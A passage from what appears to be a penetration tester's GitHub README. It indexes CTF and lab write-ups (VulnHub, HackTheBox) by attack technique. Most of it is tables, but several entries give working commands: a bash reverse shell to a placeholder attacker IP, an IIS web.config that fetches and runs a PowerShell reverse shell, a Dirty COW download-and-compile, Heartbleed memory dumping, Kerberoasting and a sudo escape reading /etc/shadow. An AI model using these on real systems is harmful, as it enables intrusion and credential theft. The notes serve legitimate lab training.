src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_ssh_privatekeys"></a> #### exploit_ssh_privatekeys [⇡](#exploit) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="exploit_ssl_heartbleed"></a> #### exploit_ssl_heartbleed [⇡](#exploit) use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system ```shell nmap --script=ssl-heartbleed -p <targetport> <targetip> python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` [+] https://github.com/sensepost/heartbleed-poc --- <a name="exploit_wordpress_defaultcreds"></a> #### exploit_wordpress_defaultcreds [⇡](#exploit) target system has wordpress configured with default credentials `admin/admin` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="exploit_wordpress_plugin"></a> #### exploit_wordpress_plugin [⇡](#exploit) certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_plugin_activitymonitor"></a> #### exploit_wordpress_plugin_activitymonitor [⇡](#exploit) wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | [+] https://www.exploit-db.com/exploits/45274 --- <a name="exploit_wordpress_plugin_hellodolly"></a> #### exploit_wordpress_plugin_hellodolly [⇡](#exploit) wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_template"></a> #### exploit_wordpress_template [⇡](#exploit) edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc"></a> ### ⚙️ PrivEsc [🡑](#ttps) <a name="privesc_anansi"></a> #### privesc_anansi [⇡](#privesc) the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell ```shell sudo /home/anansi/bin/anansi_util manual cat /etc/shadow - (press RETURN) !/bin/bash ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_bash_reverseshell"></a> #### privesc_bash_reverseshell [⇡](#privesc) bash reverse shell command ```shell bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="privesc_bof"></a> #### privesc_bof [⇡](#privesc) craft exploit for the buffer overflow vulnerability to gain elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | --- <a name="privesc_chkrootkit"></a> #### privesc_chkrootkit [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | --- <a name="privesc_credsreuse"></a> #### privesc_credsreuse [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="privesc_cron"></a> #### privesc_cron [⇡](#privesc) leverage cronjobs to modify and execute `root` owned files ```shell crontab -l cat /etc/crontab ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_cron_rootjobs"></a> #### privesc_cron_rootjobs [⇡](#privesc) it would be useful to find `root` owned cronjob processes ```shell pspy # find root owned processes, cronjobs find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root ./CheckcronJob.sh # find background processes ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | [+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/ --- <a name="privesc_ctf_usertxt_timestamp"></a> #### privesc_ctf_usertxt_timestamp [⇡](#privesc) a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files ```shell ls -lh /home/<username>/user.txt ``` [+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19 --- <a name="privesc_dirtycow"></a> #### privesc_dirtycow [⇡](#privesc) race condition that allows breakage of private read-only memory mappings ```shell wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c gcc -pthread -o dc dc.c -lcrypt ./dc ``` [+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs --- <a name="privesc_docker_group"></a> #### privesc_docker_group [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_env_relative_path"></a> #### privesc_env_relative_path [⇡](#privesc) certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="privesc_freebsd"></a> #### privesc_freebsd [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | --- <a name="privesc_iis_webconfig"></a> #### privesc_iis_webconfig [⇡](#privesc) on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file ```shell sample web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')") %> ``` [+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html --- <a name="privesc_kerberos_kerberosting"></a> #### privesc_kerberos_kerberosting [⇡](#privesc) allows us to extract administrator tickets and crack those to obtain administrator password ```shell # add entry for target system within /etc/hosts GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding psexec.py [email protected] ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://room362.com/post/2016/kerberoast-pt1/ [+] https://room362.com/post/2016/kerberoast-pt2/ [+] https://room362.com/post/2016/kerberoast-pt3/ --- <a name="privesc_kernel_ipappend"></a> #### privesc_kernel_ipappend [⇡](#privesc) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86) ```shell gcc -m32 -o exploit 9542.c -Wl,--hash-style=both ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | [+] https://www.exploit-db.com/exploits/9542 [+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698 --- <a name="privesc_kernel_overlayfs"></a> #### privesc_kernel_overlayfs [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_lxc_bash"></a> #### privesc_lxc_bash [⇡](#privesc) ```shell check output of id command if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="privesc_modssl"></a> #### privesc_modssl [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | --- <a name="privesc_mysql_creds"></a> #### privesc_mysql_creds [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_mysql_root"></a> #### privesc_mysql_root [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_mysql_udf"></a> #### privesc_mysql_udf [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 